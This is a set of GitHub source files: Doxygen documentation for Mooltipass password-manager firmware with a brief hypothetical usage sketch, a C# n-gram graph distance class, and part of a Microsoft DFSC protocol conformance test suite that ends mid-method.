class="memItemLeft" align="right" valign="top">RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#acba821e3c7d55c66ac7672fe3776edbf">addDataForDataContext</a> (uint8_t *data, uint8_t last_packet_flag)</td></tr> <tr class="memdesc:acba821e3c7d55c66ac7672fe3776edbf"><td class="mdescLeft">&#160;</td><td class="mdescRight">Add 32 bytes of data to our current data parent. 
<a href="#acba821e3c7d55c66ac7672fe3776edbf">More...</a><br /></td></tr> <tr class="separator:acba821e3c7d55c66ac7672fe3776edbf"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a1d3f3d204d12767f25eb6c32a34b5d43"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a1d3f3d204d12767f25eb6c32a34b5d43"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>get32BytesDataForCurrentService</b> (uint8_t *buffer)</td></tr> <tr class="separator:a1d3f3d204d12767f25eb6c32a34b5d43"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a8c0587ee01ee730da95ae2e2b257cca4"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8c0587ee01ee730da95ae2e2b257cca4"></a> RET_TYPE&#160;</td><td class="memItemRight" valign="bottom"><b>checkPasswordForContext</b> (uint8_t *password)</td></tr> <tr class="separator:a8c0587ee01ee730da95ae2e2b257cca4"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a0a33ec54fda2e3bddc3e2ada1ab41899"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a0a33ec54fda2e3bddc3e2ada1ab41899">askUserForLoginAndPasswordKeybOutput</a> (uint16_t child_address, char *service_name)</td></tr> <tr class="memdesc:a0a33ec54fda2e3bddc3e2ada1ab41899"><td class="mdescLeft">&#160;</td><td class="mdescRight">Ask the user to enter the login password of a given child. <a href="#a0a33ec54fda2e3bddc3e2ada1ab41899">More...</a><br /></td></tr> <tr class="separator:a0a33ec54fda2e3bddc3e2ada1ab41899"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a63ecc1b3ca1b4116bc129ba8339bf1cc"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a63ecc1b3ca1b4116bc129ba8339bf1cc"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#a63ecc1b3ca1b4116bc129ba8339bf1cc">favoritePickingLogic</a> (void)</td></tr> <tr class="memdesc:a63ecc1b3ca1b4116bc129ba8339bf1cc"><td class="mdescLeft">&#160;</td><td class="mdescRight">Logic for picking a favorite's credentials. <br /></td></tr> <tr class="separator:a63ecc1b3ca1b4116bc129ba8339bf1cc"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aa32f000bf83764ae5552c9027d8f8c8f"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa32f000bf83764ae5552c9027d8f8c8f"></a> void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="logic__aes__and__comms_8c.html#aa32f000bf83764ae5552c9027d8f8c8f">loginSelectLogic</a> (void)</td></tr> <tr class="memdesc:aa32f000bf83764ae5552c9027d8f8c8f"><td class="mdescLeft">&#160;</td><td class="mdescRight">Logic for finding a given login. 
<br /></td></tr> <tr class="separator:aa32f000bf83764ae5552c9027d8f8c8f"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="var-members"></a> Variables</h2></td></tr> <tr class="memitem:a12d527d085c5c8eac20c653d516273f5"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a12d527d085c5c8eac20c653d516273f5"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>smartcard_inserted_unlocked</b> = FALSE</td></tr> <tr class="separator:a12d527d085c5c8eac20c653d516273f5"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4d3f926d333851c4bb7c348f15168217"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a4d3f926d333851c4bb7c348f15168217"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>current_nonce</b> [AES256_CTR_LENGTH]</td></tr> <tr class="separator:a4d3f926d333851c4bb7c348f15168217"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a942c86acc4040f060bc85e5ccd0e6a07"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a942c86acc4040f060bc85e5ccd0e6a07"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>selected_login_child_node_addr</b></td></tr> <tr class="separator:a942c86acc4040f060bc85e5ccd0e6a07"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a07914f8f3d82c52a6cf6b1fcc70732c5"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a07914f8f3d82c52a6cf6b1fcc70732c5"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>selected_login_flag</b> = FALSE</td></tr> <tr class="separator:a07914f8f3d82c52a6cf6b1fcc70732c5"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a251f84f88c5b061134c26ff13a3e494e"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a251f84f88c5b061134c26ff13a3e494e"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>data_context_valid_flag</b> = FALSE</td></tr> <tr class="separator:a251f84f88c5b061134c26ff13a3e494e"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab689689ef283c40dc14cb0a9eef6c3b4"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab689689ef283c40dc14cb0a9eef6c3b4"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>context_valid_flag</b> = FALSE</td></tr> <tr class="separator:ab689689ef283c40dc14cb0a9eef6c3b4"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3fb26a5017ccf10f4f829bacac31429c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3fb26a5017ccf10f4f829bacac31429c"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>current_adding_data_flag</b> = FALSE</td></tr> <tr class="separator:a3fb26a5017ccf10f4f829bacac31429c"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:abf025b74811bbd8566306b9889bb0bbf"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="abf025b74811bbd8566306b9889bb0bbf"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>currently_adding_data_cntr</b> = 0</td></tr> <tr class="separator:abf025b74811bbd8566306b9889bb0bbf"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aa2521d127f07a04b5dcacc3fa749c569"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa2521d127f07a04b5dcacc3fa749c569"></a> uint8_t&#160;</td><td 
class="memItemRight" valign="bottom"><b>currently_reading_data_cntr</b> = 0</td></tr> <tr class="separator:aa2521d127f07a04b5dcacc3fa749c569"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:af408365d698744c60ec26bebc07d6937"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af408365d698744c60ec26bebc07d6937"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>currently_writing_first_block</b> = FALSE</td></tr> <tr class="separator:af408365d698744c60ec26bebc07d6937"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ad3cdf7b15b21ae01c1124b951a202dee"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad3cdf7b15b21ae01c1124b951a202dee"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>next_data_node_addr</b> = 0</td></tr> <tr class="separator:ad3cdf7b15b21ae01c1124b951a202dee"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ab8b2c5ac570778010ffda6fee9c8645b"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab8b2c5ac570778010ffda6fee9c8645b"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>dataNodeCtrVal</b> [3]</td></tr> <tr class="separator:ab8b2c5ac570778010ffda6fee9c8645b"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ae3f92b27415e0682faf15d0ee22612b3"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae3f92b27415e0682faf15d0ee22612b3"></a> uint8_t&#160;</td><td class="memItemRight" valign="bottom"><b>nextCtrVal</b> [USER_CTR_SIZE]</td></tr> <tr class="separator:ae3f92b27415e0682faf15d0ee22612b3"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a08ae65e65ac9cf19efc7961293cf139c"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a08ae65e65ac9cf19efc7961293cf139c"></a> uint16_t&#160;</td><td class="memItemRight" valign="bottom"><b>context_parent_node_addr</b></td></tr> <tr class="separator:a08ae65e65ac9cf19efc7961293cf139c"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a04e3309f660d10929cd0c93662d60348"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a04e3309f660d10929cd0c93662d60348"></a> <a class="el" href="structconfirmation_text__t.html">confirmationText_t</a>&#160;</td><td class="memItemRight" valign="bottom"><b>conf_text</b></td></tr> <tr class="separator:a04e3309f660d10929cd0c93662d60348"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a256d08589d9ed67d91ec330152879420"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a256d08589d9ed67d91ec330152879420"></a> <a class="el" href="structaes256_ctr_ctx__t.html">aes256CtrCtx_t</a>&#160;</td><td class="memItemRight" valign="bottom"><b>aesctx</b></td></tr> <tr class="separator:a256d08589d9ed67d91ec330152879420"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a52b223067ced03362bf5b08eaa63d2bd"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a52b223067ced03362bf5b08eaa63d2bd"></a> pNode&#160;</td><td class="memItemRight" valign="bottom"><b>temp_pnode</b></td></tr> <tr class="separator:a52b223067ced03362bf5b08eaa63d2bd"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ad286199dd3852f5810fc1913178a20a6"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad286199dd3852f5810fc1913178a20a6"></a> cNode&#160;</td><td class="memItemRight" 
valign="bottom"><b>temp_cnode</b></td></tr> <tr class="separator:ad286199dd3852f5810fc1913178a20a6"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a5fc562dd6f553cfe3736b1dbd4598193"><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5fc562dd6f553cfe3736b1dbd4598193"></a> dNode *&#160;</td><td class="memItemRight" valign="bottom"><b>temp_dnode_ptr</b> = (dNode*)&amp;temp_cnode</td></tr> <tr class="separator:a5fc562dd6f553cfe3736b1dbd4598193"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2> <div class="textblock"><p>Firmware logic - encryption and communications Created: 18/08/2014 Author: Mathieu Stephan. </p> </div><h2 class="groupheader">Function Documentation</h2> <a class="anchor" id="acba821e3c7d55c66ac7672fe3776edbf"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">addDataForDataContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>data</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>last_packet_flag</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Add 32 bytes of data to our current data parent. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">data</td><td>Block of data to add </td></tr> <tr><td class="paramname">last_packet_flag</td><td>Flag to know if it is our last packet </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Operation success or not </dd></dl> </div> </div> <a class="anchor" id="a0a33ec54fda2e3bddc3e2ada1ab41899"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">askUserForLoginAndPasswordKeybOutput </td> <td>(</td> <td class="paramtype">uint16_t&#160;</td> <td class="paramname"><em>child_address</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">char *&#160;</td> <td class="paramname"><em>service_name</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Ask the user to enter the login password of a given child. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">child_address</td><td>Address of the child </td></tr> <tr><td class="paramname">service_name</td><td>Service name </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="a853f383eaf0065dfbdb3dbcfb3eca04b"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">decrypt32bBlockOfDataAndClearCTVFlag </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>data</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>ctr</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Decrypt a block of data, clear credential_timer_valid. 
</p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">data</td><td>Data to be decrypted </td></tr> <tr><td class="paramname">ctr</td><td>Ctr value for the data </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="abe78ac5d68297cef1ed356c0741840ab"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">encrypt32bBlockOfDataAndClearCTVFlag </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>data</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>ctr</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Encrypt a block of data, clear credential_timer_valid. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">data</td><td>Data to be decrypted </td></tr> <tr><td class="paramname">ctr</td><td>Pointer to where to store the ctr </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="af605926c53e38170c91ca278dd84ae66"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">getSmartCardInsertedUnlocked </td> <td>(</td> <td class="paramtype">void&#160;</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>know if the smartcard is inserted and unlocked </p> <dl class="section return"><dt>Returns</dt><dd>The state </dd></dl> </div> </div> <a class="anchor" id="a9cc73786e07d95f0a8eb1027c8b12f8b"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">initEncryptionHandling </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>aes_key</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>nonce</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Initialize our encryption/decryption part. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">aes_key</td><td>Our AES256 key </td></tr> <tr><td class="paramname">nonce</td><td>The nonce </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="adfa8333245b42cbc18827c77b09fbabe"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">initUserFlashContext </td> <td>(</td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>user_id</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> <p>Initialize our flash context. 
</p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">user_id</td><td>The user ID </td></tr> </table> </dd> </dl> </div> </div> <a class="anchor" id="ab745dd39d25124d24f134c82a7f92884"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">uint16_t searchForLoginInGivenParent </td> <td>(</td> <td class="paramtype">uint16_t&#160;</td> <td class="paramname"><em>parent_addr</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>name</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Prototypes </p> </div> </div> <a class="anchor" id="ac858e3c344d7f63ca46362e88708c41e"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">setCurrentContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>name</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>type</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set our current context. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">name</td><td>Name of the desired service / website </td></tr> <tr><td class="paramname">type</td><td>Type of context (data or credential) </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>If we found the context </dd></dl> </div> </div> <a class="anchor" id="a9c7c9fab57070ffc66fa6fcb64c0f6e0"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">setLoginForContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>name</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>length</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set login for current context. </p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">name</td><td>String containing the login </td></tr> <tr><td class="paramname">length</td><td>String length </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Operation success or not </dd></dl> </div> </div> <a class="anchor" id="a13c7de9328d80459f78fa702bb0bd230"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">setPasswordForContext </td> <td>(</td> <td class="paramtype">uint8_t *&#160;</td> <td class="paramname"><em>password</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">uint8_t&#160;</td> <td class="paramname"><em>length</em>&#160;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td> </tr> </table> </div><div class="memdoc"> <p>Set password for current context. 
</p> <dl class="params"><dt>Parameters</dt><dd> <table class="params"> <tr><td class="paramname">password</td><td>String containing the password </td></tr> <tr><td class="paramname">length</td><td>String length </td></tr> </table> </dd> </dl> <dl class="section return"><dt>Returns</dt><dd>Operation success or not </dd></dl> </div> </div> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Thu May 5 2016 10:42:40 for Mooltipass by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.11 </small></address> </body> </html>
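The members above describe a credential-context API: callers first select (or create) a context for a service, then set or read the login and password tied to that context. The fragment below is a minimal usage sketch, not code from the Mooltipass firmware; it assumes RET_TYPE is an integer-like status type with a RETURN_OK success value, as the signatures suggest, and the buffer size and the credential-type value 0 are made up for the example.

/* Hypothetical usage sketch of the documented context API (not firmware code).
 * Assumptions: RET_TYPE/RETURN_OK behave as the signatures above suggest;
 * the type argument value and buffer size are placeholders. */
#include <stdint.h>

#define EXAMPLE_BUF_LEN 64  /* made-up size for the sketch */

static void store_example_credential(void)
{
    uint8_t service[] = "example.org";
    uint8_t login[]   = "alice";
    uint8_t pass[]    = "correct horse battery staple";

    /* Select the credential context for the service, creating it if missing. */
    if (setCurrentContext(service, 0 /* assumed: credential type */) != RETURN_OK)
    {
        if (addNewContext(service, (uint8_t)sizeof(service), 0) != RETURN_OK)
        {
            return; /* could not create the parent node */
        }
        (void)setCurrentContext(service, 0);
    }

    /* Store the login and password for the selected context. */
    (void)setLoginForContext(login, (uint8_t)sizeof(login));
    (void)setPasswordForContext(pass, (uint8_t)sizeof(pass));

    /* Later, read the login back for the same context. */
    char buffer[EXAMPLE_BUF_LEN];
    if (getLoginForContext(buffer) == RETURN_OK)
    {
        /* buffer now holds the stored login */
    }
}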
{ "pile_set_name": "Github" }
using Improvisation.Library.Distance; using System; using System.Collections.Generic; using System.Linq; using System.Runtime.CompilerServices; using System.Text; using System.Threading.Tasks; namespace Improvisation.Library.GraphOperations { public class NGramSemanticGraphDistance<T> where T : IEquatable<T> { public float TolerancePerNode { get; set; } public float EmptyNodeWeight { get; set; } public IDistance<float> ProbabilityDistace { get; set; } public readonly Func<float, float> TransformFunction; public NGramSemanticGraphDistance() : this(new EuclideanDistance<float>(), new Func<float, float>(x => x)) { } public NGramSemanticGraphDistance(IDistance<float> e, Func<float, float> transform, float tolerance = 0F, float empty = 1F) { e.NullCheck(); transform.NullCheck(); this.TolerancePerNode = tolerance; this.EmptyNodeWeight = empty; this.ProbabilityDistace = e; this.TransformFunction = transform; } public float Distance(NGramGraphMarkovChain<T> left, NGramGraphMarkovChain<T> right, NGramGraphDistanceType type = NGramGraphDistanceType.CompleteGraph) { left.NullCheck(); right.NullCheck(); switch (type) { case NGramGraphDistanceType.CompleteGraph: return (this.DistanceCompleteWithRespectToLeft(left, right) + this.DistanceCompleteWithRespectToLeft(right, left)) / 2F; case NGramGraphDistanceType.SubGraph: if (left.Count() > right.Count()) { return this.DistanceCompleteWithRespectToLeft(right, left); } return this.DistanceCompleteWithRespectToLeft(left, right); } throw new NotImplementedException(); } private float DistanceCompleteWithRespectToLeft(NGramGraphMarkovChain<T> left, NGramGraphMarkovChain<T> right) { float sum = 0; foreach (var item in left) { var node = item.Key; if (!right.ValidNode(node)) { sum += this.ToleranceTransform(this.TransformFunction(this.EmptyNodeWeight)); continue; } var rightConnections = right.Edges(node).Select(y => this.TransformFunction(y.Probability)).ToArray(); var total = this.TransformFunction((float)this.ProbabilityDistace.Distance(item.Value.Select(x => this.TransformFunction(x.Probability)).ToArray(), rightConnections)); if (total / (float)left.Count() < this.TolerancePerNode) { sum += 0; } else { sum += total; } } return sum / (this.TransformFunction(1F) * (float)right.Grams.Count()); } [MethodImpl(MethodImplOptions.AggressiveInlining)] private float ToleranceTransform(float f) { if (f < this.TolerancePerNode) { return 0; } return f; } } }
{ "pile_set_name": "Github" }
// Copyright (c) Microsoft. All rights reserved. // Licensed under the MIT license. See LICENSE file in the project root for full license information. using Microsoft.Protocols.TestSuites.FileSharing.Common.Adapter; using Microsoft.Protocols.TestTools; using Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Dfsc; using Microsoft.Protocols.TestTools.StackSdk.FileAccessService.Smb2; using Microsoft.VisualStudio.TestTools.UnitTesting; using System; namespace Microsoft.Protocols.TestSuites.FileSharing.DFSC.TestSuite { [TestClass] public class DCReferralToDC : DFSCTestBase { #region Test Suite Initialization // Use ClassInitialize to run code before running the first test in the class [ClassInitialize()] public static void ClassInitialize(TestContext testContext) { TestClassBase.Initialize(testContext); } // Use ClassCleanup to run code after all tests in a class have run [ClassCleanup()] public static void ClassCleanup() { TestClassBase.Cleanup(); } #endregion [TestMethod] [TestCategory(TestCategories.Bvt)] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [Description("Client sends a version 3 DC referral request with a valid domain name(FQDN) to DC and expects positive response.")] public void BVT_DCReferralV3ToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a version 3 DC referral request with a valid domain name(FQDN) to DC."); DfscReferralResponsePacket respPacket = utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V3, TestConfig.ValidFQDNPath, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_SUCCESS, status, "DC Referral to DC Response has failed with status " + Smb2Status.GetStatusCode(status)); VerifyResponse(respPacket, true); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Positive)] [Description("Client sends a v4 DC referral request EX with a valid domain name(NETBIOS) to DC and expects positive response.")] public void DCReferralV4EXNetBiosToDC() { utility.CheckEXOverSMB(); uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v4 DC referral request EX with a valid domain name(NETBIOS) to DC."); DfscReferralResponsePacket respPacket = utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V4, TestConfig.ValidNETBIOSPath, true, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_SUCCESS, status, "DC Referral to DC Response has failed with status " + Smb2Status.GetStatusCode(status)); VerifyResponse(respPacket, false); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Positive)] [Description("Client sends a v4 DC referral request EX with a site name to DC and expects positive response.")] public void DCReferralV4EXSiteToDC() { utility.CheckEXOverSMB(); uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v4 DC referral request EX with a site name to DC."); DfscReferralResponsePacket respPacket = utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V4, TestConfig.ValidFQDNPath, true, true, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_SUCCESS, status, "DC Referral to DC Response has failed with status " + 
Smb2Status.GetStatusCode(status)); VerifyResponse(respPacket, true); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Compatibility)] [Description("Client sends a v4 DC referral request with an invalid domain name(NETBIOS) to DC and expects negative response.")] public void InvalidDCReferralToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v4 DC referral request with an invalid domain name(NETBIOS) to DC."); utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V4, "\\" + DFSCTestUtility.Consts.InvalidComponent, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_INVALID_PARAMETER, status, "Expected Invalid DC Referral to DC Response is STATUS_INVALID_PARAMETER, but real status is " + Smb2Status.GetStatusCode(status)); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Compatibility)] [Description("Client sends a v1 DC referral request to DC and expects negative response.")] public void DCReferralV1ToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v1 DC referral request to DC."); utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V1, TestConfig.ValidFQDNPath, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_UNSUCCESSFUL, status, "Expected DC Referral v1 to DC Response is STATUS_UNSUCCESSFUL, but real status is " + Smb2Status.GetStatusCode(status)); } [TestMethod] [TestCategory(TestCategories.Dfsc)] [TestCategory(TestCategories.NonSmb)] [TestCategory(TestCategories.Compatibility)] [Description("Client sends a v2 DC referral request to DC and expects negative response.")] public void DCReferralV2ToDC() { uint status; BaseTestSite.Log.Add(LogEntryKind.TestStep, "Client sends a v2 DC referral request to DC."); utility.SendAndReceiveDFSReferral(out status, client, ReferralEntryType_Values.DFS_REFERRAL_V2, TestConfig.ValidFQDNPath, true); BaseTestSite.Log.Add(LogEntryKind.TestStep, "Verify server response."); BaseTestSite.Assert.AreEqual(Smb2Status.STATUS_UNSUCCESSFUL, status, "Expected DC Referral v1 to DC Response is STATUS_UNSUCCESSFUL, but real status is " + Smb2Status.GetStatusCode(status)); } /// <summary> /// Verify response of DC referral request /// </summary> /// <param name="respPacket">Response packet of DC referral request</param> /// <param name="fqdnOrNetbios">If the domain name is FQDN format or NetBIOS format</param> private void VerifyResponse(DfscReferralResponsePacket respPacket, bool fqdnOrNetbios) { BaseTestSite.Assert.AreEqual((ushort)0, respPacket.ReferralResponse.PathConsumed, "PathConsumed must be set to 0"); BaseTestSite.Assert.AreEqual((ushort)0x0001, respPacket.ReferralResponse.NumberOfReferrals, "NumberOfReferrals must be set to 1"); DFS_REFERRAL_V3V4_NameListReferral[] respV3 = client.RetrieveReferralEntries<DFS_REFERRAL_V3V4_NameListReferral>(respPacket, (ushort)ReferralEntryType_Values.DFS_REFERRAL_V3); uint timeToLive = respV3[0].TimeToLive; bool containValidDC = false; string expectedDCName; string expectedSpecialName; if (fqdnOrNetbios) { expectedDCName = string.Format(@"\{0}.{1}", TestConfig.DCServerName, TestConfig.DomainFQDNName); expectedSpecialName = TestConfig.ValidFQDNPath; } else { expectedDCName = @"\" + TestConfig.DCServerName; 
